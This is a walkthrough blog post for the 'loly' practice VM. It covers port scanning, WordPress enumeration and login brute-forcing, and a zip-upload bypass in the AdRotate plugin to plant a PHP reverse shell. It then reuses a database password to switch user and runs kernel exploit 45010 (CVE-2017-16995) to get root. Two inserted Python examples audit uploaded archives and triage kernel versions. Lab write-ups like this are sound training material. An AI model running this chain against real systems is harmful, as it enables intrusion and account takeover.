loly VM

Information gathering

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.144
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-26 09:56 EDT
Nmap scan report for 192.1.1.144
Host is up (0.00085s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:87:63:9E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 9.02 seconds

Only port 80 is open? Let's try a UDP scan.

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.144
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-26 09:58 EDT
Nmap scan report for 192.1.1.144
Host is up (0.00045s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp open|filtered msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp closed ipp
1434/udp open|filtered ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp open|filtered unknown
MAC Address: 00:0C:29:87:63:9E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.45 seconds

Nothing useful there; let's do version detection.

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ sudo nmap -sT -sV -sC -O -p80 192.1.1.144
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-26 09:59 EDT
Nmap scan report for 192.1.1.144
Host is up (0.00043s latency).

PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
MAC Address: 00:0C:29:87:63:9E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.45 seconds

Looks like there is no obvious way in; visiting port 80 directly just shows the default nginx page.

Directory brute-forcing

Let's brute-force directories and see what turns up.

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ sudo dirsearch -u http://192.1.1.144

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.144/_23-08-26_10-00-09.txt

Error Log: /root/.dirsearch/logs/errors-23-08-26_10-00-09.log

Target: http://192.1.1.144/

[10:00:09] Starting:
[10:00:49] 200 - 7KB - /wordpress/wp-login.php
[10:00:49] 200 - 28KB - /wordpress/

Task Completed

WordPress. Let's take a look in the browser.

The page renders incorrectly. Looking at the source reveals a domain, loly.lc; add it to the hosts file.

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ sudo vim /etc/hosts

Visiting again, the page now displays correctly.

WordPress penetration testing

It actually looks quite nice. Let's run wpscan against it.

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ sudo wpscan --url http://loly.lc/wordpress -e ap,u
[sudo] password for kali:
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | \'_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://loly.lc/wordpress/ [192.1.1.144]
[+] Started: Mon Aug 28 02:27:05 2023

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://loly.lc/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://loly.lc/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://loly.lc/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
| Found By: Rss Generator (Passive Detection)
| - http://loly.lc/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.5</generator>
| Confirmed By: Emoji Settings (Passive Detection)
| - http://loly.lc/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5'

[+] WordPress theme in use: feminine-style
| Location: http://loly.lc/wordpress/wp-content/themes/feminine-style/
| Last Updated: 2023-08-01T00:00:00.000Z
| Readme: http://loly.lc/wordpress/wp-content/themes/feminine-style/readme.txt
| [!] The version is out of date, the latest version is 3.0.4
| Style URL: http://loly.lc/wordpress/wp-content/themes/feminine-style/style.css?ver=5.5
| Style Name: Feminine Style
| Style URI: https://www.acmethemes.com/themes/feminine-style
| Description: Feminine Style is a voguish, dazzling and very appealing WordPress theme. The theme is completely wo...
| Author: acmethemes
| Author URI: https://www.acmethemes.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://loly.lc/wordpress/wp-content/themes/feminine-style/style.css?ver=5.5, Match: Version: 1.0.0

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] adrotate
| Location: http://loly.lc/wordpress/wp-content/plugins/adrotate/
| Last Updated: 2023-08-14T14:57:00.000Z
| [!] The version is out of date, the latest version is 5.12.4
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 5.8.6.2 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://loly.lc/wordpress/wp-content/plugins/adrotate/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] loly
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] A WordPress Commenter
| Found By: Rss Generator (Passive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Aug 28 02:27:09 2023
[+] Requests Done: 56
[+] Cached Requests: 7
[+] Data Sent: 15.305 KB
[+] Data Received: 428.714 KB
[+] Memory used: 246.496 MB
[+] Elapsed time: 00:00:04

Found a plugin, adrotate, and a username, loly.

Searching for vulnerabilities in this plugin only turns up issues in older versions. I also tried searching for vulnerabilities in this WordPress version, with no result. On the lost-password page I tried admin and loly, which confirmed there is no admin user.

So the only option left is brute-forcing: capture the login request with Burp, then brute-force it with Burp's built-in wordlist.

That yields a password: fernando

Try logging into the admin backend with this password.

Reverse shell

There is an awkward problem: editing the theme source and uploading themes or plugins all appear to have been disabled. After digging around, the only possible entry point seems to be the media management page of the adrotate plugin.

There is a file upload spot, but it appears to use a whitelist, and a %00 truncation cannot bypass it either; I was stuck for a while. Reading the list of supported formats carefully, I noticed zip is among them, and the note says archives are extracted automatically, so I zipped the reverse-shell PHP file and uploaded that.

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ zip php.zip php-reverse-shell.php
adding: php-reverse-shell.php (deflated 60%)
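The bypass works because the plugin unpacks the archive without re-applying its upload whitelist to the extracted entries. As an added example (not code from the post or from the AdRotate plugin), this is the audit an upload handler should run over an archive before extracting it; the whitelist, the script-extension list and the sample archive are constructed assumptions.

```python
"""Audit an uploaded archive before it is auto-extracted.

Added example, not code from the loly VM or the AdRotate plugin.
Assumption: the upload handler accepts a zip and unpacks it into a
web-served directory, so each entry must pass the same whitelist
as a direct upload would.
"""
import io
import posixpath
import zipfile

# Extensions a direct media upload would accept (assumed whitelist).
ALLOWED_EXTS = {".png", ".jpg", ".jpeg", ".gif"}
# Extensions the web server would execute under the document root.
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".phar"}


def audit_zip(data: bytes) -> list[str]:
    """Return reasons to reject the archive; an empty list means safe to extract."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            norm = posixpath.normpath(name)
            # Traversal, absolute or backslash paths escape the upload directory.
            if norm.startswith("..") or name.startswith("/") or "\\" in name:
                problems.append(f"{name}: path escapes upload directory")
                continue
            if info.is_dir():
                continue
            # Look at every dotted suffix so 'shell.php.png' is caught as well.
            parts = posixpath.basename(norm).lower().split(".")[1:]
            exts = {"." + p for p in parts}
            if exts & SCRIPT_EXTS:
                problems.append(f"{name}: server-side script inside archive")
            elif not parts or "." + parts[-1] not in ALLOWED_EXTS:
                problems.append(f"{name}: extension not in upload whitelist")
    return problems


def build_sample_zip(include_bad: bool = True) -> bytes:
    """Constructed sample: one legitimate image, optionally plus the two entry kinds to reject."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("banner.png", b"\x89PNG\r\n\x1a\n")
        if include_bad:
            zf.writestr("php-reverse-shell.php", b"<?php /* constructed placeholder */")
            zf.writestr("../outside.txt", b"x")
    return buf.getvalue()
```

Rejecting on any finding, rather than silently skipping the bad entries, also keeps the upload log honest about what was attempted.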

Although it reported a successful upload, nothing showed up in the list below.

At first I thought the upload had failed and got stuck for another while; then I tried curl and found that the reverse shell had connected successfully.

www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:87:63:9e brd ff:ff:ff:ff:ff:ff
inet 192.1.1.144/24 brd 192.1.1.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe87:639e/64 scope link
valid_lft forever preferred_lft forever
www-data@ubuntu:/$ uname -a
uname -a
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/$ sudo -l
[sudo] password for www-data

Privilege escalation

Let's see which users exist.

www-data@ubuntu:/$ ls -alih /home 
ls -alih /home
total 12K
655361 drwxr-xr-x 3 root root 4.0K Aug 19 2020 .
2 drwxr-xr-x 22 root root 4.0K Aug 19 2020 ..
655370 drwxr-xr-x 3 loly loly 4.0K Aug 27 19:31 loly

There is a user loly. Next, let's look at the WordPress configuration file.

www-data@ubuntu:~/html/wordpress$ ls  
ls
index.php wp-blog-header.php wp-includes wp-settings.php
license.txt wp-comments-post.php wp-links-opml.php wp-signup.php
readme.html wp-config.php wp-load.php wp-trackback.php
wp-activate.php wp-content wp-login.php xmlrpc.php
wp-admin wp-cron.php wp-mail.php
www-data@ubuntu:~/html/wordpress$ cat wp-config.php
cat wp-config.php

define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

Found the database connection password; try logging in as user loly with it. I also tried su to root with both the brute-forced password and this one, which failed.

www-data@ubuntu:~/html/wordpress$ su loly
su loly
Password: lolyisabeautifulgirl

loly@ubuntu:/var/www/html/wordpress$ whoami
whoami
loly
loly@ubuntu:/var/www/html/wordpress$ id
id
uid=1000(loly) gid=1000(loly) groups=1000(loly),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
loly@ubuntu:/var/www/html/wordpress$ sudo -l
sudo -l
[sudo] password for loly: lolyisabeautifulgirl

Sorry, user loly may not run sudo on ubuntu.

Checked SUID files, the permissions on passwd and shadow, and sensitive files in the home directory; nothing.

Tried linpeas.sh to help gather information; still nothing.

All that's left is kernel privilege escalation.

loly@ubuntu:/tmp$ uname -a                                                                                           
uname -a
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
loly@ubuntu:/tmp$ cat /etc/issue
cat /etc/issue
Ubuntu 16.04.1 LTS \n \l

Filter the candidates.

These are the closest matches. I am still not very experienced at prioritising them; I had to try four or five one by one before finding the one that escalates successfully.

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ searchsploit -m 45010
Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/45010
Path: /usr/share/exploitdb/exploits/linux/local/45010.c
Codes: CVE-2017-16995
Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Downloads/loly/45010.c
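
The filtering step above compares the running kernel with the version bound in each Exploit-DB title. As an added example (not code from the post, searchsploit or linpeas; all helper names are mine), this triage parses the `uname -a` line and the title's bound and reports whether the kernel falls in the affected range, with the caveat that distributions backport fixes, so a match is a lead to confirm rather than proof.

```python
"""Triage a kernel exploit candidate against the target's kernel string.

Added example, not code from the post, searchsploit or linpeas. It parses
the `uname -a` line and the version bound in an Exploit-DB title and says
whether the running kernel falls inside the affected range. Distributions
backport fixes, so a match is a lead to verify on the host, not proof.
"""
import re

# Copied from the post's shell session and from the searchsploit output.
UNAME = ("Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 "
         "00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux")
TITLE = ("Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) "
         "- Local Privilege Escalation")

OPS = {"<": lambda a, b: a < b, "<=": lambda a, b: a <= b,
       ">": lambda a, b: a > b, ">=": lambda a, b: a >= b,
       "=": lambda a, b: a == b}


def parse_version(s: str) -> tuple[int, ...]:
    """'4.4.0-31-generic' -> (4, 4, 0): only the upstream x.y.z is compared."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", s)
    if not m:
        raise ValueError(f"no kernel version in {s!r}")
    return tuple(int(g or 0) for g in m.groups())


def kernel_from_uname(line: str) -> tuple[int, ...]:
    """The third field of `uname -a` is the kernel release."""
    return parse_version(line.split()[2])


def constraint_from_title(title: str):
    """'Linux Kernel < 4.13.9 ...' -> ('<', (4, 13, 9)); None if no bound."""
    m = re.search(r"Linux Kernel\s*(<=|<|>=|>|=)\s*(\d+(?:\.\d+)*)", title)
    return (m.group(1), parse_version(m.group(2))) if m else None


def candidate_applies(uname_line: str, title: str) -> bool:
    """True when the upstream kernel version satisfies the title's bound."""
    c = constraint_from_title(title)
    if c is None:
        return False
    op, bound = c
    return OPS[op](kernel_from_uname(uname_line), bound)


if __name__ == "__main__":
    print("in affected range:", candidate_applies(UNAME, TITLE))
```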
loly@ubuntu:/tmp$ gcc 45010.c -o 45010  
gcc 45010.c -o 45010
loly@ubuntu:/tmp$ ./45010
./45010
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800742c2500
[*] Leaking sock struct from ffff880079da3fc0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88007805ef00
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88007805ef00
[*] credentials patched, launching shell...
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(loly)
# uname -a
uname -a
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
____ ____ ____ ____
/ ___| _ _ _ __ / ___/ ___|| _ \
\___ \| | | | '_ \| | \___ \| |_) |
___) | |_| | | | | |___ ___) | _ <
|____/ \__,_|_| |_|\____|____/|_| \_\

Congratulations. I'm BigCityBoy

When choosing an exploit, weigh the searchsploit results together with linpeas's recommendations.

Summary

The most painful part was still the kernel privilege escalation. I don't think there is a great method for this; you can only


loly VM
https://i3eg1nner.github.io/2023/08/81677a8f4b9c.html
Author: I3eg1nner
Published: 28 August 2023